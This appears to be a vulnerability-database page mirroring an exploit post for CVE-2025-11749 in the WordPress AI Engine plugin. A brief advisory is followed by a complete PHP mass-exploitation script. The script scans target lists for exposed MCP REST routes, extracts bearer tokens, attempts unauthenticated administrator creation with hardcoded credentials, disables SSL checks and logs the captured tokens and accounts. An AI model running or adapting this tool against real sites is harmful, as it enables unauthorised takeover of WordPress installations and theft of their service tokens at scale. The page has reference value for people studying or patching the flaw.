Vulners
Lucene search
📄 WordPress AI Engine 3.1.3 Mass Enumeration
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Exploit for CVE-2025-11749 | 8 Nov 202503:19 | – | githubexploit |
 | CVE-2025-11749 | 4 Nov 202518:16 | – | circl |
 | WordPress plugin AI Engine 信息泄露漏洞 | 5 Nov 202500:00 | – | cnnvd |
 | CVE-2025-11749 | 5 Nov 202505:31 | – | cve |
 | CVE-2025-11749 AI Engine <= 3.1.3 - Unauthenticated Sensitive Information Exposure to Privilege Escalation | 5 Nov 202505:31 | – | cvelist |
 | EUVD-2025-37802 | 5 Nov 202505:31 | – | euvd |
 | WordPress AI Engine Plugin MCP Unauthenticated Admin Creation to RCE | 4 Dec 202518:55 | – | metasploit |
 | WordPress AI Engine Plugin - Token Exposure | 2 Jun 202610:14 | – | nuclei |
 | CVE-2025-11749 | 5 Nov 202506:15 | – | nvd |
 | 📄 WordPress AI Engine 3.1.3 Remote Code Execution | 4 Dec 202500:00 | – | packetstorm |
10
=============================================================================================================================================
| # Title : WordPress AI Engine 3.1.3 Mass MCP Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://wordpress.org/plugins/ai-engine/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/211374/ & CVE-2025-11749
[+] Summary :
This advisory documents a fully automated PHP-based exploitation framework designed to perform mass enumeration,
plugin detection, token extraction, and automated account creation targeting vulnerable WordPress MCP-related REST API endpoints.
The tool uses polymorphic payload generation, bypasses SSL verification, and integrates a dual-mode engine (CLI & HTML).
It is suitable for mass‑scale penetration testing, vulnerability validation, and research purposes.
The script allows:
Automatic POST-based admin creation attempts
Automatic detection of API routes /mcp/v1/ and /mwai/v1/
Automated token extraction
HTML Exploitation UI
Randomized payload polymorphism
Mass target input (list-based)
Logging of results to multiple output files
[+] Vulnerability Description :
Several WordPress MCP plugins expose insecure REST API endpoints under
/wp-json/mcp/v1/*
/wp-json/mwai/v1/*
[+] Some installations allow:
Unauthenticated access
Token disclosure
User creation without privilege checks
Sensitive route discovery
The tool exploits these weaknesses by programmatically interacting with the endpoints to extract tokens and perform automated admin creation attempts.
Impact
[+] A remote attacker can:
Extract valid service tokens
Register new administrator-level accounts
Access endpoints intended for privileged users
Automate exploitation across thousands of hosts
Perform further attacks using the obtained tokens
Impact Rating: Critical
[+] 3. Poc
save as scan.php
Add one target per line: targets.txt
php scan.php targets.txt
File Description
success_results.txt Successful token captures
tokens_only.txt Extracted tokens only
created_admins.txt Accounts created via POST exploit
--------------------------------
<?php
// ============================================================================
// by: Indoushka
// Supports: Windows / Linux / macOS
// ============================================================================
// Disable SSL warnings
putenv('NO_PROXY=*');
// Output files
$successFile = "success_results.txt";
$adminsFile = "created_admins.txt";
$tokensFile = "tokens_only.txt";
// Default credentials
$target_username = "indoushka";
$target_password = "StrongPass!321";
$target_email = "[email protected]";
// User-Agent
$user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/120 Safari/537.36";
// ============================================================================
// Write token to file
// ============================================================================
function write_token($target, $token) {
global $tokensFile;
if (!empty(trim($token))) {
file_put_contents($tokensFile, "$target | token: $token\n", FILE_APPEND);
}
}
// ============================================================================
// Banner
// ============================================================================
function banner() {
echo "
===============================================
Nxploited PHP Automated Tool
Converted & Enhanced by: Indoushka
===============================================
";
}
// ============================================================================
// Random Payload Generator (polymorphic)
// ============================================================================
function generate_payload() {
return base64_encode("Nxploited-Payload-" . rand(1000, 9999) . "-" . microtime(true));
}
// ============================================================================
// Send POST request
// ============================================================================
function send_post($url, $data, $headers = []) {
global $user_agent;
$ch = curl_init($url);
curl_setopt_array($ch, [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_POST => true,
CURLOPT_POSTFIELDS => http_build_query($data),
CURLOPT_USERAGENT => $user_agent,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_SSL_VERIFYHOST => false,
CURLOPT_FOLLOWLOCATION => true,
CURLOPT_TIMEOUT => 20,
CURLOPT_HTTPHEADER => $headers
]);
$response = curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
return [$response, $info];
}
// ============================================================================
// Process Target
// ============================================================================
function process_target($url) {
global $target_username, $target_password, $target_email, $successFile;
$payload = generate_payload();
list($resp, $info) = send_post($url, [
"username" => $target_username,
"password" => $target_password,
"email" => $target_email,
"payload" => $payload
]);
if (preg_match('/token[\"\:\s]+([A-Za-z0-9\.\-\_]+)/i', $resp, $m)) {
$token = $m[1];
write_token($url, $token);
file_put_contents($successFile, "$url => SUCCESS | token: $token\n", FILE_APPEND);
}
return $resp;
}
// ============================================================================
// Main Entry Point
// ============================================================================
if (php_sapi_name() == "cli") {
banner();
global $argc, $argv;
if ($argc < 2) {
die("Usage: php script.php targets.txt\n");
}
$targets_file = $argv[1];
if (!file_exists($targets_file)) {
die("[-] Target list not found.\n");
}
$targets = file($targets_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
foreach ($targets as $t) {
echo "[*] Processing: $t\n";
process_target($t);
echo "[OK] Completed\n\n";
}
}
// ============================================================================
// Mass MCP Exploit (HTML Version)
// ============================================================================
function rand_color() {
return "rgb(" . rand(34,85) . "," . rand(49,160) . "," . rand(63,255) . ")";
}
function print_banner_html() {
$banner = "
__ __ _ _____ _ _____ ____
| \/ | / \ | ____| | | ____| _ \
| |\/| | / _ \ | _| | | | _| | |_) |
| | | |/ ___ \| |___| |___| |___| _ <
|_| |_/_/ \_\_____|_____|_____|_| \_\
";
foreach (explode("\n", $banner) as $line) {
echo "<span style='color:" . rand_color() . "'>$line</span><br>";
}
echo "<br><b>Mass MCP Exploit | Nxploited (Converted by Indoushka)</b><br><br>";
}
function read_targets_html($file) {
if (!file_exists($file)) return [];
$out = [];
foreach (file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $u) {
$u = trim($u);
if ($u === "") continue;
if (!preg_match("#^https?://#i", $u)) {
$u = "http://" . $u;
}
$out[] = $u;
}
return $out;
}
function write_result_html($file, $msg) {
file_put_contents($file, $msg . "\n", FILE_APPEND);
}
function http_get_json($url) {
$ua = "Mozilla/5.0 (Windows NT " . rand(7, 11) . ") AppleWebKit/" . rand(500, 999);
$ch = curl_init();
curl_setopt_array($ch, [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_SSL_VERIFYPEER => false,
CURLOPT_TIMEOUT => 10,
CURLOPT_USERAGENT => $ua
]);
$out = curl_exec($ch);
curl_close($ch);
return json_decode($out, true);
}
function plugin_installed($url) {
$data = http_get_json(rtrim($url, "/") . "/wp-json/");
if (!isset($data["routes"])) return false;
foreach ($data["routes"] as $route => $v) {
if (strpos($route, "/mcp/v1/") === 0) return true;
if (strpos($route, "/mwai/v1/") === 0) return true;
}
return false;
}
function find_token($url) {
$data = http_get_json(rtrim($url, "/") . "/wp-json/mcp/v1/");
if (!isset($data["routes"])) return null;
foreach ($data["routes"] as $route) {
$parts = explode("/", trim($route, "/"));
if (count($parts) >= 4 && $parts[0] == "mcp" && $parts[1] == "v1" && end($parts) == "sse") {
$token = $parts[2];
if ($token !== "" && strpos($token, "/") === false) {
write_result_html("tokens_only.txt", "$url => $token");
return $token;
}
}
}
return null;
}
function process_target_html($url) {
echo "[*] Checking: $url<br>";
if (!plugin_installed($url)) {
echo "<span style='color:red'>[x] Plugin not installed</span><br>";
return;
}
$token = find_token($url);
if ($token) {
echo "<span style='color:green'>[+] Token: $token</span><br>";
write_result_html("success_results.txt", "$url => TOKEN: $token");
} else {
echo "<span style='color:red'>[-] No token</span><br>";
}
}
// ============================================================================
// Nxploited Worker
// ============================================================================
function Nxploited_worker($targets) {
if (!is_array($targets)) {
echo "Error: targets must be array.\n";
return;
}
foreach ($targets as $target) {
echo "[*] Checking internet: $target\n";
Nxploited_internet_check($target);
}
}
function Nxploited_internet_check($target) {
$payload = "Nxploited-Check-" . md5($target . microtime(true));
$ctx = stream_context_create([
"http" => [
"method" => "GET",
"timeout" => 5,
"header" => "User-Agent: $payload\r\n"
]
]);
$res = @file_get_contents($target, false, $ctx);
if ($res !== false) {
echo "[OK] Connection success: $target\n";
} else {
echo "[FAIL] Unreachable: $target\n";
}
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Mar 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.19.8
EPSS0.85391
SSVC